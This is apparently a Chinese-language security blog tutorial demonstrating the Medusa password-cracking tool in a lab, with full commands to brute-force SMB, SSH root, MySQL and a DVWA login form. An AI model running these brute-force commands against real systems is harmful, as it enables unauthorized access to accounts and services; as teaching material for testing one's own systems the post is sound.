最新消息:

实例演示之Medusa在线密码破解

Kali Linux Eternal 7103浏览 0评论

Medusa和hydra一样,同样属于在线密码破解工具。不同的是,medusa 的稳定性相较于 hydra 要好很多。但是也有缺陷。它的支持模块要比 hydra 少很多,也不支持 rdp 服务协议。同时,它的表单破解也存在着问题。但是不论什么工具,我们都应取其精华,善于利用。下面让我们来看看,如何使用它。

首先,我们在终端输入命令,查看medusa所支持的模块。
medusa -d

20161001114008

我们可以看到,它支持多达20几种的模块。

现在我以破解Windows的smb来做关于Windows密码破解的演示。输入命令:

medusa -M smbnt -h 192.168.1.100 -u Eternal -P pass.lst -e ns -F -v 3

-M: 表示你要破解的类型。

-h:目标机器地址。

-u:用户名。

-e : 尝试空密码。

-F:破解成功后立即停止破解。

-v:显示破解过程。

20161001115954

接着,让我们来尝试破解 Linux 的ssh服务密码。输入命令:

medusa -M ssh -h 192.168.30.128 -u root -P pass.lst -e ns -F

20161001113250

我们再来破解下该服务器上跑的数据库密码。输入命令:

medusa -M mysql -h 192.168.30.128 -e ns -F -u root -P pass.lst

20161001120739

我们可以看到,密码很快就被破解。这里用的是空密码。

最后我们来个表单破解还是以dvwa为例。

破解表单登录密码我们要用到web-form 这个模块。如果你不知道该模块如何使用,我们可以输入以下命令来进行查看。

medusa -M web-form -q

-q: 查询的意思。

20161001121041

下面开始破解。输入命令:

medusa -h 192.168.30.128 -u admin -P pass.lst -M web-form -m FORM:”dvwa/login.php” -m DENY-SIGNAL:”login.php” -m FORM-DATA:”post?user=username&pass=password&Login=Login”

20161001121703

当我们回车,我们会发现有报错,密码并未被成功破解。这是因为medusa本身存在的表单破解缺陷导致的。它不支持正确特征码的验证,只支持错误的。所以,导致 login.php 和前面的 login.php 起冲突。

转载请注明:即刻安全 » 实例演示之Medusa在线密码破解

您必须 登录 才能发表评论!

网友最新评论 (1)



合作伙伴